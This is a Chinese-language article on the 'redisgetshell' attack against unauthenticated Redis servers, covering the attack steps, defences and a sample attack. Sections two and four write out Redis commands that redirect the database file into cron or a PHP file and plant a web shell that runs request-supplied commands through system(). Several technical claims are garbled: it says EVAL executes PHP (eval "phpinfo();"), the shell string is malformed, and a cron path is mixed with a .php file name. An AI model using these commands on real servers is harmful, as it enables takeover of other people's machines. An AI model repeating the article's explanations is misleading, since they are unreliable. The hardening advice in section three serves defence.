一、redisgetshell介绍
redisgetshell是一种利用Redis未授权访问漏洞,通过修改Redis配置文件或者通过Redis命令执行恶意代码达到控制服务器的攻击手段。redisgetshell攻击属于典型的内网攻击方式,攻击者可以通过局域网络内任意一台机器,在未进行严格安全设置的情况下,远程控制受害机器
在redisgetshell攻击中,攻击者一般会通过Redis的SET命令将攻击代码写入到Redis的某个键中,然后再利用Redis的EVAL命令执行代码。由于Redis是单线程的,且EVAL命令允许执行任意代码,因此攻击者可以通过Redis命令轻易地掌控服务器,并进一步通过上传/下载文件、开启网络服务等方式打开后门
二、redisgetshell攻击流程
redisgetshell攻击一般包括以下步骤:
1、获取未授权访问的Redis服务
2、修改Redis配置文件,将bind参数设置为0.0.0.0或注释掉参数,启用网络通信功能;或者直接通过Redis未授权访问漏洞获取Redis的操作权限
config set dir /var/spool/cron/ config set dbfilename root set x "';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '';die; }?>" config set dbfilename "backup.php" save
3、利用Redis的SET命令将攻击代码写入到Redis的某个键里
set payload ""
4、通过Redis的EVAL命令执行攻击代码
eval "phpinfo();"
5、进一步上传/下载文件、开启网络服务等方式打开后门
三、如何防范redisgetshell攻击
为了避免redisgetshell攻击,可以从以下几个方面进行防范:
1、设置Redis密码,避免未授权访问
2、禁用危险的Redis命令,如EVAL命令,避免攻击者通过Redis命令执行恶意代码
rename-command EVAL dummy
3、限制Redis服务的网络访问范围,避免外部服务器或恶意用户可以通过网络直接连接到Redis服务
4、定期更新Redis版本,及时修补已知漏洞
5、定期检查Redis服务的日志,发现异常及时进行处理
四、redisgetshell攻击实例
以下是一段实际的redisgetshell攻击代码示例:
config set dir /var/spool/cron/ config set dbfilename root set x "';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '';die; }?>" config set dbfilename "backup.php" save set payload "" eval "phpinfo();"
五、结语
redisgetshell攻击是一种典型的内网攻击手段,可以通过利用Redis未授权访问漏洞直接控制服务器。为了防范这种攻击方式,在平时的工作中,我们要定期检查Redis配置,避免存在安全漏洞;同时,在发布Redis服务时,需要设置管理员账号和密码,并限制服务的访问范围,防止被攻击者利用。